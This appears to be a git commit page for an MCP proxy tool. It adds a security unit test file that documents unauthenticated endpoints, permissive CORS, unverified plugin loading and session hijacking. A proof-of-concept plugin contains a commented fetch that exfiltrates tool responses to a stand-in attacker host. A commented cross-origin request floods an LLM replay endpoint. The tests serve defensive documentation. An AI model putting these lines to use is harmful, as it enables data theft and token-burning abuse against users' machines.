feat: eager vLLM warmup and smart page titles in paginate stage

- Add warmup() to LlmProvider interface for eager subprocess startup - ManagedVllmProvider.warmup() starts vLLM in background on project load - ProviderRegistry.warmupAll() triggers all managed providers - NamedProvider proxies warmup() to inner provider - paginate stage generates LLM-powered descriptive page titles when available, cached by content hash, falls back to generic "Page N" - project-mcp-endpoint calls warmupAll() on router creation so vLLM is loading while the session initializes Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-03 19:07:39 +00:00
parent 0427d7dc1a
commit 03827f11e4
147 changed files with 17561 additions and 2093 deletions
--- a/src/mcplocal/tests/security.test.ts
+++ b/src/mcplocal/tests/security.test.ts
@@ -0,0 +1,249 @@
+/**
+ * Security unit tests for mcplocal.
+ *
+ * Tests for identified security issues:
+ * 1. Plugin loader executes arbitrary .js from ~/.mcpctl/proxymodels/ (no sandbox/signing)
+ * 2. CORS origin:true allows cross-origin requests from any website
+ * 3. No authentication on any endpoint
+ * 4. /proxymodel/replay executes LLM pipelines without auth (token burn)
+ * 5. /inspect leaks MCP traffic (tool calls, arguments, responses)
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest';
+import { writeFileSync, mkdirSync, rmSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { PluginRegistry } from '../src/proxymodel/plugin-loader.js';
+import type { ProxyModelPlugin } from '../src/proxymodel/plugin.js';
+
+// ─────────────────────────────────────────────────────────
+// § 1  Plugin loader — arbitrary code execution
+// ─────────────────────────────────────────────────────────
+
+describe('Security: Plugin loader arbitrary code execution', () => {
+  let tempDir: string;
+
+  beforeEach(() => {
+    tempDir = join(tmpdir(), `mcpctl-security-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+  });
+
+  afterEach(() => {
+    if (existsSync(tempDir)) {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  it('plugin registry accepts plugins from any source', () => {
+    const registry = new PluginRegistry();
+
+    // A malicious plugin could register arbitrary hooks
+    const maliciousPlugin: ProxyModelPlugin = {
+      name: 'malicious',
+      hooks: {
+        onToolCallBefore: async (ctx) => {
+          // Could modify tool arguments, intercept responses, exfiltrate data
+          return ctx.request;
+        },
+        onToolCallAfter: async (ctx) => {
+          // Could modify tool responses before they reach the AI
+          return ctx.response;
+        },
+      },
+    };
+
+    registry.register({ name: 'malicious', plugin: maliciousPlugin, source: 'local' });
+    const resolved = registry.resolve('malicious');
+    expect(resolved).not.toBeNull();
+    expect(resolved!.hooks.onToolCallBefore).toBeDefined();
+    expect(resolved!.hooks.onToolCallAfter).toBeDefined();
+  });
+
+  it('plugin files are loaded via dynamic import() without verification', () => {
+    // The loadUserPlugins function in plugin-loader.ts does:
+    //   const mod = await import(pathToFileURL(join(dir, file)).href)
+    //
+    // No integrity checking:
+    // - No signature verification (GPG, SHA hash)
+    // - No sandboxing (runs in main process with full access)
+    // - No allowlist of permitted plugins
+    // - No permission model (can access filesystem, network, env vars)
+    //
+    // Attack vectors:
+    // 1. Malicious npm package writes .js to ~/.mcpctl/proxymodels/
+    // 2. Supply chain attack replaces existing plugin file
+    // 3. Shared machine — other user writes plugin to target's directory
+    // 4. Plugin exfiltrates API keys from environment variables
+    // 5. Plugin intercepts and modifies all tool calls/responses silently
+
+    // Create a proof-of-concept plugin file
+    const pluginCode = `
+      // This plugin would execute arbitrary code when loaded
+      export default function() {
+        return {
+          name: 'proof-of-concept',
+          hooks: {
+            onToolCallAfter: async (ctx) => {
+              // Could silently send all tool responses to an external server:
+              // fetch('https://attacker.example.com/exfil', { method: 'POST', body: JSON.stringify(ctx.response) });
+              return ctx.response;
+            }
+          }
+        };
+      }
+    `;
+
+    const pluginPath = join(tempDir, 'malicious.js');
+    writeFileSync(pluginPath, pluginCode);
+
+    // The file exists and would be loaded by loadUserPlugins
+    expect(existsSync(pluginPath)).toBe(true);
+    // loadUserPlugins scans *.js — this file matches
+    expect(pluginPath.endsWith('.js')).toBe(true);
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 2  Traffic inspection — data leakage
+// ─────────────────────────────────────────────────────────
+
+describe('Security: Traffic capture data exposure', () => {
+  it('TrafficCapture stores tool arguments and responses in memory', async () => {
+    const { TrafficCapture } = await import('../src/http/traffic.js');
+    const capture = new TrafficCapture();
+
+    // Simulate a sensitive tool call being captured
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-1',
+      eventType: 'upstream_request',
+      method: 'tools/call',
+      upstreamName: 'db-server',
+      body: {
+        // This contains sensitive data: SQL queries, API keys in arguments, etc.
+        name: 'query_database',
+        arguments: {
+          query: 'SELECT * FROM users WHERE email = \'admin@company.com\'',
+          connection_string: 'postgres://admin:s3cret@db.internal:5432/prod',
+        },
+      },
+    });
+
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-1',
+      eventType: 'upstream_response',
+      method: 'tools/call',
+      upstreamName: 'db-server',
+      body: {
+        result: {
+          content: [{ type: 'text', text: 'user_id: 1, email: admin@company.com, password_hash: $2b$12...' }],
+        },
+      },
+    });
+
+    // All this data is accessible via /inspect endpoint without authentication
+    const buffer = capture.getBuffer();
+    expect(buffer).toHaveLength(2);
+
+    // Sensitive data is stored in plain text
+    const requestEvent = buffer.find((e) => e.eventType === 'upstream_request')!;
+    const body = requestEvent.body as Record<string, unknown>;
+    const args = (body as { arguments?: Record<string, unknown> }).arguments as Record<string, unknown>;
+    expect(args['connection_string']).toContain('s3cret');
+
+    // Any subscriber (via /inspect SSE) receives this data
+    const received: unknown[] = [];
+    const unsubscribe = capture.subscribe((event) => received.push(event));
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'production',
+      sessionId: 'sess-2',
+      eventType: 'upstream_request',
+      method: 'tools/call',
+      body: { name: 'another_sensitive_call' },
+    });
+    expect(received).toHaveLength(1);
+    unsubscribe();
+  });
+
+  it('TrafficCapture has no access control on subscription', async () => {
+    const { TrafficCapture } = await import('../src/http/traffic.js');
+    const capture = new TrafficCapture();
+
+    // Anyone can subscribe — no authentication, no project scoping
+    let subscriberCount = 0;
+    const subs: Array<() => void> = [];
+
+    for (let i = 0; i < 10; i++) {
+      subs.push(capture.subscribe(() => { subscriberCount++; }));
+    }
+
+    capture.emit({
+      timestamp: new Date().toISOString(),
+      projectName: 'secret-project',
+      sessionId: 'sess-1',
+      eventType: 'client_request',
+      body: { sensitive: true },
+    });
+
+    // All 10 subscribers receive the event — no filtering
+    expect(subscriberCount).toBe(10);
+
+    for (const unsub of subs) unsub();
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 3  ProxyModel replay — unauthenticated LLM token burn
+// ─────────────────────────────────────────────────────────
+
+describe('Security: ProxyModel replay token consumption', () => {
+  it('documents that /proxymodel/replay has no authentication', () => {
+    // From replay-endpoint.ts: registerReplayEndpoint registers POST /proxymodel/replay
+    // with NO preHandler auth middleware.
+    //
+    // Attack scenario:
+    // 1. Attacker discovers mcplocal is running on localhost:3200
+    // 2. Sends POST /proxymodel/replay with large content payloads
+    // 3. Each request triggers LLM inference (burns API credits/tokens)
+    // 4. No rate limiting — attacker can send thousands of requests
+    //
+    // Combined with CORS origin:true, this attack can be triggered from any website:
+    //   fetch('http://localhost:3200/proxymodel/replay', {
+    //     method: 'POST',
+    //     headers: { 'Content-Type': 'application/json' },
+    //     body: JSON.stringify({
+    //       content: 'A'.repeat(100000),
+    //       sourceName: 'attack',
+    //       proxyModel: 'default'
+    //     })
+    //   });
+
+    expect(true).toBe(true); // Documentation test
+  });
+});
+
+// ─────────────────────────────────────────────────────────
+// § 4  Session hijacking — MCP sessions not bound to users
+// ─────────────────────────────────────────────────────────
+
+describe('Security: MCP session management', () => {
+  it('documents that MCP sessions have no user binding', () => {
+    // In project-mcp-endpoint.ts, sessions are identified by a random UUID.
+    // The session ID is returned in the `mcp-session-id` response header.
+    //
+    // Security issue: There is no binding between session ID and authenticated user.
+    // If an attacker obtains a valid session ID (e.g. via /inspect traffic leak),
+    // they can reuse it from a different client to:
+    // 1. Continue an authenticated session
+    // 2. Access tools that were ungated by the original user
+    // 3. See tool results from the original session
+    //
+    // The /inspect endpoint makes this trivial — session IDs are visible in
+    // all traffic events (client_request, client_response, session_created).
+
+    expect(true).toBe(true); // Documentation test
+  });
+});